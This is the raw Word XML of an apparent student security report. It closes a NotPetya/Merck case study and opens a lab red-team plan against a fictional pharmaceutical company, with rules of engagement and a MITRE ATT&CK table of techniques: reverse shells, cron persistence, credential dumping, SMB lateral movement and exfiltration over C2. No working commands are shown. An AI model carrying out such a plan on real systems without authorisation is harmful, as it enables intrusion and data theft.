      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B867B89" w14:textId="2F39C614" w:rsidR="00AF28EE" w:rsidRPr="003C1EBA" w:rsidRDefault="003C1EBA" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc215851838"/>
      <w:bookmarkStart w:id="15" w:name="_Toc216881400"/>
      <w:r w:rsidRPr="003C1EBA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VI. Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="513E19AD"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack at Merck shows how major global operational failure can be triggered through just one supply-chain compromise, especially when the technical, architectural, and human weaknesses come together. By mapping the attack to MITRE ATT&amp;CK, the attack's path reveals very clearly the weaknesses in patching, dividing the network, and securing credentials. It is important to make improvements in the areas of prevention, monitoring, and network design in order to minimize the chances and effects of such advanced threats in the future. A multi-layered </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is guided by intelligence is necessary to keep pharmaceutical research and critical operations safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017ED022" w14:textId="66703D6A" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="00204F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc215851839"/>
      <w:bookmarkStart w:id="17" w:name="_Toc216881401"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PART 2 — Red Team Engagement: Operation IP Shield</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="7903572E" w14:textId="4542ED31" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="003C1EBA" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc215851840"/>
      <w:bookmarkStart w:id="19" w:name="_Toc216881402"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">I. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="10346DB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Scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466190A5"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present certified Red Team evaluation is about the hybrid environment of Cureton Pharmaceutical Company (CPC). The activity of testing is distributed into three major segments as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F6E641" w14:textId="417D65F2" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing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physical R&amp;D network with its components such as Active Directory, Windows Server machines,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research systems, and internal web applications, all of which are involved in the testing procedure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC1D0F" w14:textId="1F3520B8" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing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A mock cloud environment represented by the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web server that is to be used for the test. This cloud environment stands in for the real AWS VPC clinical-data portal of CPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E23B34D" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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CI/CD environment comprising developer repositories and automated pipelines, like GitHub Actions, will all go through safe, non-destructive reconnaissance only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA24534"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primary objective of the assessment is to get a sample of dummy research data, exfiltrate it, and do all these things without having the detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E458029"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Allowed Techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B525513"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Both passive and active reconnaissance (like Nmap and directory scanning) are among the allowed techniques. Also, web application testing with tools such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, exploiting exposed services, gaining remote access through reverse shells, setting temporary persistence (e.g.,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 xml:space="preserve"> jobs), credential enumeration, SMB-based lateral movement, and controlled data exfiltration are permitted. The use of living-off-the-land binaries as well as stealth command-and-control operations is authorized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40968BE0"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Among the prohibited actions are: destructive attacks, ransomware, data corruption, escalation of privileges that changes the integrity of the system, DDoS attacks, or access to real production clinical data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A80DF4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Communication Protocols:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D026488"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Red Team should never stop communicating with the engagement lead. Any significant event like acquiring higher access or unforeseen technical problems—needs to be reported straight away. CPC has the right to trigger an emergency stop whenever they want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7A90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Safety Boundaries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C0925"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There should be no interruption of service due to testing. Live patient data, production databases, and manufacturing systems are entirely prohibited areas. It is only allowed to use dummy data for your work. No changes that last will be made to the systems, and all the techniques used for maintaining the presence must be eliminated during the cleaning phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC85863" w14:textId="5CB4A83B" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>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Assumptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DCC0CF" w14:textId="10A7D019" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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DVWA</w:t>
      </w:r>
      <w:r w:rsidR="00E311F9" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM used to simulate cloud (AWS EC2) workloads.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DDBCA3" w14:textId="5E001B09" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Windows Server used to represent on-prem Active Directory.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A815E" w14:textId="451A07A7" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Sliver C2 simulated due to licensing restrictions of commercial tools.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6761F047" w14:textId="12A47447" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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All data used was dummy/non-production.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB08C9" w14:textId="4A0D7CC4" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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No external systems or third-party assets were targeted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3477B299" w14:textId="490FB0CF" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00B40682" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc215851841"/>
      <w:bookmarkStart w:id="21" w:name="_Toc216881403"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>II. Threat Emulation Plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="6F0B6F7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Objective:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7942E6AE" w14:textId="349F1780" w:rsidR="00B40682" w:rsidRPr="0065635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 xml:space="preserve">The purpose of Operation IP Shield is to emulate an APT (Advanced Persistent Threat) attack which is stealthy and is directed towards the Cureton Pharmaceutical Company (CPC). The activity consists of the following phases: acquiring access to the simulated hybrid environment, keeping presence, moving internally across systems, and lastly taking off a controlled sample of doctored research data without the defensive measures being triggered. This trial evaluates the detection capability of CPC in relation to the on-prem AD systems, the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research server (cloud proxy), and development infrastructure. The Red Team will employ the same real APT-style </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>behaviors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, including Living-Off-the-Land (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LOLBin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) techniques and covert command-and-control (C2), as those used by modern threat actors who target intellectual property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FA9585" w14:textId="4EF71DE6"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Selected TTPs (MITRE IDs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8087ED" w14:textId="27FB38B8" w:rsidR="007D6DE3" w:rsidRPr="00B40682" w:rsidRDefault="007D6DE3" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc215851907"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Table 1: Selected TTPs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a"/>
        <w:tblW w:w="4374"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936"/>
        <w:gridCol w:w="973"/>
        <w:gridCol w:w="685"/>
        <w:gridCol w:w="1780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="7F804D8B" w14:textId="77777777" w:rsidTr="00656352">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="936"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2846AD70" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="24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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="973"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3A787C47" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="24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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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3B4485EC" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="24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MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1780"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4ED293E3" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="24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How It Will Be Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="0D3C8FD1"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82BC4C7"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Reconnaissance</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2290D17"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Active Scanning</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BE7FC81"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T1595</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DCEAFD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Host discovery &amp; port scanning using Nmap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="7578AD6D"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7660E0E"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Reconnaissance</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13613B7"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Web Directory Enumeration</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29F2B2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T1592.004</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F47183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Gobuster</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B40682">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B40682">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Dirb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B40682">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> to identify hidden directories.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="1D80EC91" w14:textId="77777777" w:rsidTr="00656352">
        <w:trPr>
          <w:trHeight w:val="558"/>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1A21853"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Initial Access</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28BE705"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Exploit Public-Facing Application</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C2A6D81"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T1190</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2B7BAAA" w14:textId="417D6C36"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Test for misconfigurations/vulnerabilities on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web server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="66FE18BB"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6004439"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Execution</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03463ED7"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Command Shell Execution</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8E56299"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T1059.004</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3044CAB"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Bash reverse shell via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B40682">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B40682">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="28B29D49"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D07AB41"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Persistence</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A41B6F9"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Scheduled Task / Cron</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61570E7"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T1053.003</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F995730"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Cron job to regain shell on reboot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="582EABF6"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748D2FB"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Privilege   Escalation</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FD2E2BD"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SUID / Permission Abuse</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08515AA9"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T1548.001</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40FAB62"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Enumeration of SUID binaries    for local escalation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="3CD52A39"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187E2A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Credential Access</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50EAB7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OS Credential Dumping</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ED4875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T1003</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A58D44B"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Attempt credential collection on Linux/Windows hosts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="54CFD2D7"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8C1929D"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Lateral     Movement</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5227CEF"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SMB/Windows Admin Shares</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71FA5E1"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T1021.002</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42B8666"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SMB share enumeration on Windows server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="7A315093"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43D86F80"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C2</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613A62D5"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Reverse Shell Communication</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17EE5D59"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T1105</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E7FDC40"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Netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B40682">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> is used as a C2 channel.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="22A4B234" w14:textId="77777777" w:rsidTr="00656352">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="936"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50ED02A0"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Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="973"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2F8A8B45"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Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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710D930E"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T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="20" w:type="dxa"/>
              <w:left w:w="20" w:type="dxa"/>
              <w:bottom w:w="20" w:type="dxa"/>
              <w:right w:w="20" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30CF7ABF" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="24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Extract dummy research data via NC or HTTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23552CF0" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00AF28EE" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A9C7E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Expected Kill Chain Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67E003" w14:textId="232650AA"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first step of the operation is to perform an external examination of the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research server and scan the internal network. The team anticipates that their first point of entry will be through an unprotected web service and they will then establish a hidden reverse shell for communication purposes. In order to remain in the environment, they will implement a scheduled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 xml:space="preserve"> job. Next, they will attempt to escalate their privileges and employ SMB enumeration to move lateral into the Windows systems. Once they are in the areas of interest, the Red Team will prepare and secretly transfer the target research data using the same encrypted command-and-control channel to avoid detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050991CF"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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="14F0272F" wp14:editId="5C1BFB75">
            <wp:extent cx="2877975" cy="3162300"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
            <wp:docPr id="2031451329"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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2877975" cy="3162300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B66F3" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc215851879"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 2: Expected Kill Chain Flow for Operation IP Shield</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="2B194D53"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(Self-created using sources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496E864" w14:textId="16B6EC92" w:rsidR="0093184D" w:rsidRPr="00B40682" w:rsidRDefault="0093184D"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 xml:space="preserve">Advanced C2 Simulation Using </w:t>
      </w:r>
      <w:r w:rsidR="00E311F9" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Silver</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B373E8A" w14:textId="22E5644A"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Licensing and ethical limitations made it impossible to use commercial C2 tools like Cobalt Strike directly. Rather, a mocked-up Advanced C2 setup was presented using the open-source Sliver framework, which made the stealth and evasion requirement satiated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AAAE10" w14:textId="3166FEEA"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documentation of the least possible simulation was as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209F93F" w14:textId="739A1270"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MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E239D09" w14:textId="78C24566" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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T1105 — Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
